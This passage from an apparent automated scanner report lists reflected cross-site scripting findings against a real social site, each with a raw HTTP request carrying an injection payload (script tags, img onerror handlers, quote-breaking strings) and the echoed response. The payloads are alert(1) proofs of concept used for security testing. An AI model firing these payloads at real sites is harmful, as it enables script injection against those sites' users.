
...[SNIP]...
<div id="content" class="content-wrap">Could not find action: joind8253<img src=a onerror=alert(1)>5d0e25f3a03.</div>
...[SNIP]...
2.20. http://www.bebo.com/c/invite/join [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7c09'><script>alert(1)</script>33e80344b01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/invite/joina7c09'><script>alert(1)</script>33e80344b01 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14137
Date: Wed, 06 Jul 2011 14:07:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/invite/joina7c09'><script>alert(1)</script>33e80344b01&QueryString=&Lang=fr'>
...[SNIP]...
2.21. http://www.bebo.com/c/invite/join [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf77"><img%20src%3da%20onerror%3dalert(1)>07344209637 was submitted in the REST URL parameter 3. This input was echoed as 9cf77"><img src=a onerror=alert(1)>07344209637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/invite/join9cf77"><img%20src%3da%20onerror%3dalert(1)>07344209637 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14231
Date: Wed, 06 Jul 2011 14:07:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-invite-join9cf77"><img src=a onerror=alert(1)>07344209637" >
...[SNIP]...
2.22. http://www.bebo.com/c/invite/join [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95e49'%3b2c9f03bb687 was submitted in the REST URL parameter 3. This input was echoed as 95e49';2c9f03bb687 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/invite/join95e49'%3b2c9f03bb687 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 13943
Date: Wed, 06 Jul 2011 14:07:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
gName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/invite/join95e49';2c9f03bb687/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...
2.23. http://www.bebo.com/c/photos/albums [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83e70'%3b0dc4117bbd6 was submitted in the REST URL parameter 2. This input was echoed as 83e70';0dc4117bbd6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/photos83e70'%3b0dc4117bbd6/albums HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14229
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
em.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/photos83e70';0dc4117bbd6/albums/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');p
...[SNIP]...
2.24. http://www.bebo.com/c/photos/albums [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9aaa<script>alert(1)</script>78e54a70e84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photosc9aaa<script>alert(1)</script>78e54a70e84/albums HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14422
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/photosc9aaa<script>alert(1)</script>78e54a70e84/albums page, please try again.</div>
...[SNIP]...
2.25. http://www.bebo.com/c/photos/albums [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c6fb0'><script>alert(1)</script>92bae72a79e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photosc6fb0'><script>alert(1)</script>92bae72a79e/albums HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14440
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/photosc6fb0'><script>alert(1)</script>92bae72a79e/albums&QueryString=&Lang=nl'>
...[SNIP]...
2.26. http://www.bebo.com/c/photos/albums [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c86"><img%20src%3da%20onerror%3dalert(1)>003cdead8cf was submitted in the REST URL parameter 2. This input was echoed as 34c86"><img src=a onerror=alert(1)>003cdead8cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos34c86"><img%20src%3da%20onerror%3dalert(1)>003cdead8cf/albums HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14523
Date: Wed, 06 Jul 2011 14:07:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-photos34c86"><img src=a onerror=alert(1)>003cdead8cf-albums" >
...[SNIP]...
2.27. http://www.bebo.com/c/photos/albums [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb1ed'><script>alert(1)</script>5a54fcd6248 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photos/albumseb1ed'><script>alert(1)</script>5a54fcd6248 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14155
Date: Wed, 06 Jul 2011 14:07:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/photos/albumseb1ed'><script>alert(1)</script>5a54fcd6248&QueryString=&Lang=fr'>
...[SNIP]...
2.28. http://www.bebo.com/c/photos/albums [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad90a<img%20src%3da%20onerror%3dalert(1)>0e7c1b6f097 was submitted in the REST URL parameter 3. This input was echoed as ad90a<img src=a onerror=alert(1)>0e7c1b6f097 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos/albumsad90a<img%20src%3da%20onerror%3dalert(1)>0e7c1b6f097 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14231
Date: Wed, 06 Jul 2011 14:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: albumsad90a<img src=a onerror=alert(1)>0e7c1b6f097.</div>
...[SNIP]...
2.29. http://www.bebo.com/c/photos/albums [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e305'%3be2820506b7a was submitted in the REST URL parameter 3. This input was echoed as 1e305';e2820506b7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/photos/albums1e305'%3be2820506b7a HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 13961
Date: Wed, 06 Jul 2011 14:07:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
ame=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/photos/albums1e305';e2820506b7a/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...
2.30. http://www.bebo.com/c/photos/albums [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cb98"><img%20src%3da%20onerror%3dalert(1)>1bd7bb69789 was submitted in the REST URL parameter 3. This input was echoed as 8cb98"><img src=a onerror=alert(1)>1bd7bb69789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos/albums8cb98"><img%20src%3da%20onerror%3dalert(1)>1bd7bb69789 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14249
Date: Wed, 06 Jul 2011 14:07:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-photos-albums8cb98"><img src=a onerror=alert(1)>1bd7bb69789" >
...[SNIP]...
2.31. http://www.bebo.com/c/photos/view [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ffdf<script>alert(1)</script>65fe05ee977 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photos9ffdf<script>alert(1)</script>65fe05ee977/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14404
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/photos9ffdf<script>alert(1)</script>65fe05ee977/view page, please try again.</div>
...[SNIP]...
2.32. http://www.bebo.com/c/photos/view [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a008f'%3b1394c6af40d was submitted in the REST URL parameter 2. This input was echoed as a008f';1394c6af40d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/photosa008f'%3b1394c6af40d/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14211
Date: Wed, 06 Jul 2011 14:07:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
em.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/photosa008f';1394c6af40d/view/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pag
...[SNIP]...
2.33. http://www.bebo.com/c/photos/view [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fea54"><img%20src%3da%20onerror%3dalert(1)>ca5a51baf93 was submitted in the REST URL parameter 2. This input was echoed as fea54"><img src=a onerror=alert(1)>ca5a51baf93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photosfea54"><img%20src%3da%20onerror%3dalert(1)>ca5a51baf93/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14505
Date: Wed, 06 Jul 2011 14:07:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-photosfea54"><img src=a onerror=alert(1)>ca5a51baf93-view" >
...[SNIP]...
2.34. http://www.bebo.com/c/photos/view [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 455fd'><script>alert(1)</script>138643e700 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photos455fd'><script>alert(1)</script>138643e700/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14413
Date: Wed, 06 Jul 2011 14:07:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/photos455fd'><script>alert(1)</script>138643e700/view&QueryString=&Lang=nl'>
...[SNIP]...
2.35. http://www.bebo.com/c/photos/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 103df'%3bc6d06da1c12 was submitted in the REST URL parameter 3. This input was echoed as 103df';c6d06da1c12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/photos/view103df'%3bc6d06da1c12 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 13943
Date: Wed, 06 Jul 2011 14:07:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
gName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/photos/view103df';c6d06da1c12/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...
2.36. http://www.bebo.com/c/photos/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a2db<img%20src%3da%20onerror%3dalert(1)>03474b4f7cb was submitted in the REST URL parameter 3. This input was echoed as 4a2db<img src=a onerror=alert(1)>03474b4f7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos/view4a2db<img%20src%3da%20onerror%3dalert(1)>03474b4f7cb HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14213
Date: Wed, 06 Jul 2011 14:07:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: view4a2db<img src=a onerror=alert(1)>03474b4f7cb.</div>
...[SNIP]...
2.37. http://www.bebo.com/c/photos/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6167c"><img%20src%3da%20onerror%3dalert(1)>1abe4877bca was submitted in the REST URL parameter 3. This input was echoed as 6167c"><img src=a onerror=alert(1)>1abe4877bca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos/view6167c"><img%20src%3da%20onerror%3dalert(1)>1abe4877bca HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14231
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-photos-view6167c"><img src=a onerror=alert(1)>1abe4877bca" >
...[SNIP]...
2.38. http://www.bebo.com/c/photos/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3720f'><script>alert(1)</script>cb368be3171 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photos/view3720f'><script>alert(1)</script>cb368be3171 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14137
Date: Wed, 06 Jul 2011 14:07:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/photos/view3720f'><script>alert(1)</script>cb368be3171&QueryString=&Lang=fr'>
...[SNIP]...
2.39. http://www.bebo.com/c/search [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce915'%3be214f87d530 was submitted in the REST URL parameter 2. This input was echoed as ce915';e214f87d530 in the application's response.

